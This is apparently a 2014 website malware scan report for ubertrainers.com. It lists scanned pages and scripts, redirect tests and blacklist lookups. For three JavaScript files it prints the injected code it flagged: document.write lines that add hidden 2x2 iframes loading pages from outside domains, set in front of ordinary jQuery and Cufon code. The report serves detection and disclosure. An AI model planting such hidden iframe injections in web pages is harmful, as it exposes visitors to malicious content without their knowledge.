Scanned pages/files
Request | Server response | Status |
http://ubertrainers.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 05 Oct 2014 11:30:47 GMT Location: http://www.ubertrainers.com.au/ Server: Apache Content-Length: 239 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.ubertrainers.com.au/ | 200 OK Content-Length: 19136 Content-Type: text/html | clean |
http://www.ubertrainers.com.au/js/jquery.min.js | 200 OK Content-Length: 57254 Content-Type: application/javascript | clean |
http://ubertrainers.com/js/jquery.corner.js | 200 OK Content-Length: 10218 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://jmiller3d.com/zowf.html?j=1873044></iframe>');
;(function($) { var style = document.createElement('div').style; var moz = style['MozBorderRadius'] !== undefined; var webkit = style['WebkitBorderRadius'] !== undefined; var radius = style['borderRadius'] !== undefined || style['BorderRadius'] !== undefined; var mode = document.documentMode || 0; } d.appendChild($vert[0]); } } } } }); }; $.fn.uncorner = function() { if (radius || moz || webkit) this.css(radius ? 'border-radius' : moz ? '-moz-border-radius' : '-webkit-border-radius', 0); $('div.jquery-corner', this).remove(); return this; }; $.fn.corner.defaults = { useNative: true, metaAttr: 'data-corner' }; })(jQuery); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://jmiller3d.com/zowf.html?j=1873044 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://jmiller3d.com/zowf.html?j=1873044> | ||
http://ubertrainers.com/js/jquery.cycle.all.js | 200 OK Content-Length: 43073 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://herohouse.com/zomd.html?j=1873044></iframe>');
;(function($) { var ver = '2.72'; if ($.support == undefined) { $.support = { opacity: !($.browser.msie) }; } function debug(s) { if ($.fn.cycle.debug) log(s); } function log() { if (window.console && window.console.log) window.console.log('[cycle] ' var bb = b < h ? b + parseInt(step * ((h-b)/count || 1)) : h; var rr = r < w ? r + parseInt(step * ((w-r)/count || 1)) : w; $next.css({ clip: 'rect('+tt+'px '+rr+'px '+bb+'px '+ll+'px)' }); (step++ <= count) ? setTimeout(f, 13) : $curr.css('display', 'none'); })(); }); opts.cssBefore = { display: 'block', opacity: 1, top: 0, left: 0 }; opts.animIn = { left: 0 }; opts.animOut = { left: 0 }; }; })(jQuery); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://herohouse.com/zomd.html?j=1873044 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://herohouse.com/zomd.html?j=1873044> | ||
http://ubertrainers.com/js/cufon-yui.js | 200 OK Content-Length: 18258 Content-Type: application/javascript | clean |
http://ubertrainers.com/js/Geogrotesque_Lg_300.font.js | 200 OK Content-Length: 201978 Content-Type: application/javascript | clean |
http://ubertrainers.com/js/Geogrotesque_Bd_700.font.js | 200 OK Content-Length: 194103 Content-Type: application/javascript | clean |
http://ubertrainers.com/js/cufon-replace.js | 200 OK Content-Length: 1746 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://jmiller3d.com/zowf.html?j=1873044></iframe>');
Cufon.replace('div.captionArea h2', { fontFamily: 'Geogrotesque Lg', fontSize: '24px' }); Cufon.replace('span.headNormal', { fontFamily: 'Geogrotesque Lg', fontSize: '32px', letterSpacing:'-1px' }); Cufon.replace('span.headBold', { fontFamily: 'Geogrotesque Bd', fontSize: '32px', fontWeight:'bold' }); Cufon.r Cufon.replace('span.courseBoldOrange', { fontFamily: 'Geogrotesque Bd', fontSize: '28px', fontWeight:'bold' }); Cufon.replace('span.courseBoldBlack', { fontFamily: 'Geogrotesque Bd', fontSize: '23px', fontWeight:'bold' }); Cufon.replace('div.UrbenBusiness_Container_orange', { fontFamily: 'Geogrotesque Lg', fontSize: '20px' }); Cufon.replace('div.news_container h1', { fontFamily: 'Geogrotesque Bd', fontSize: '15px' }); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://jmiller3d.com/zowf.html?j=1873044 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://jmiller3d.com/zowf.html?j=1873044> | ||
http://ubertrainers.com/js/ddsmoothmenu.js | 200 OK Content-Length: 6604 Content-Type: application/javascript | clean |
http://ubertrainers.com/Accredited-Training | 200 OK Content-Length: 22270 Content-Type: text/html | clean |
http://ubertrainers.com/js/jquery.min.js | 200 OK Content-Length: 57254 Content-Type: application/javascript | clean |
http://ubertrainers.com/about | 200 OK Content-Length: 18622 Content-Type: text/html | clean |
http://s7.addthis.com/js/250/addthis_widget.js | 200 OK Content-Length: 6875 Content-Type: text/javascript | clean |
http://ubertrainers.com/about/testimonials | 200 OK Content-Length: 19011 Content-Type: text/html | clean |
http://ubertrainers.com/about/js/jquery.min.js | 404 Not Found Content-Length: 18013 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ubertrainers.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 05 Oct 2014 11:30:47 GMT
Location: http://www.ubertrainers.com.au/
Server: Apache
Content-Length: 239
Content-Type: text/html; charset=iso-8859-1
...239 bytes of data.
GET / HTTP/1.1
Host: ubertrainers.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 05 Oct 2014 11:30:47 GMT
Location: http://www.ubertrainers.com.au/
Server: Apache
Content-Length: 239
Content-Type: text/html; charset=iso-8859-1
...239 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ubertrainers.com
Referer: http://www.google.com/search?q=ubertrainers.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ubertrainers.com
Referer: http://www.google.com/search?q=ubertrainers.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ubertrainers.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ubertrainers.com/
Result: ubertrainers.com is not infected or malware details are not published yet.
Result: ubertrainers.com is not infected or malware details are not published yet.